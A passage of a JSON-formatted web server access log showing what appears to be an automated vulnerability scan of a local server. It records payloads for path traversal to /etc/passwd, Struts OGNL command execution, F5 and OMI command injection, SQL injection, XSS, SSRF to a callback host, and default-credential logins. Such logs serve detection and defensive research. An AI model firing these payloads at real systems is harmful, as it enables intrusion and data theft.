+0000","request_body":"command=list%20%2Ftmp%2Fnonexistent","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elocker_old/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"command=delete%20cli%20alias%20private%20list","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /misc.php?action=showpopups&type=friend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/credentials.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/pbootcms.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/etc/config.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"\x0D\x0A \x0D\x0A HTTP://127.0.0.1/wsman/\x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\x0D\x0A \x0D\x0A http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous\x0D\x0A \x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript\x0D\x0A 102400\x0D\x0A uuid:00B60932-CC01-0005-0000-000000010000\x0D\x0A PT1M30S\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A root/scx\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A aWQ=\x0D\x0A \x0D\x0A 0\x0D\x0A true\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wsman HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeViews HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.006","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"return=index.php&username=administrator&password=root","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webacs/pages/common/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DnnImageHandler.ashx?mode=file&url=http://c9v8h8gsmpv8c1qg07h0afgjzu4exj6m5.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"appno= 1 union SELECT 98989*443131,1&editor=cn&site=web","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vr2conf/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfmc/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/user/values.xml?var=STATUS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/Login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"action=verify-haras","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/rpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /downloadfile.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"{\x22query\x22:\x22# Welcome to GraphiQL\x5Cn#\x5Cn# GraphiQL is an in-browser tool for writing, validating, and\x5Cn# testing GraphQL queries.\x5Cn#\x5Cn# Type queries into this side of the screen, and you will see intelligent\x5Cn# typeaheads aware of the current GraphQL type schema and live syntax and\x5Cn# validation errors highlighted within the text.\x5Cn#\x5Cn# GraphQL queries typically start with a \x5C\x22{\x5C\x22 character. Lines that starts\x5Cn# with a # are ignored.\x5Cn#\x5Cn# An example GraphQL query might look like:\x5Cn#\x5Cn# {\x5Cn# field(arg: \x5C\x22value\x5C\x22) {\x5Cn# subField\x5Cn# }\x5Cn# }\x5Cn#\x5Cn# Keyboard shortcuts:\x5Cn#\x5Cn# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\x5Cn#\x5Cn# Run Query: Ctrl-Enter (or press the play button above)\x5Cn#\x5Cn# Auto Complete: Ctrl-Space (or just start typing)\x5Cn#\x5Cn\x5Cn{\x5Cn users {\x5Cn nodes {\x5Cn id\x5Cn name\x5Cn username\x5Cn }\x5Cn }\x5Cn}\x22,\x22variables\x22:null,\x22operationName\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/-/graphql-explorer", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sessions/new HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/pkg?command= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=rsvp-admin-export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vkd/GetWelcomeScreen.event HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.998","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:51 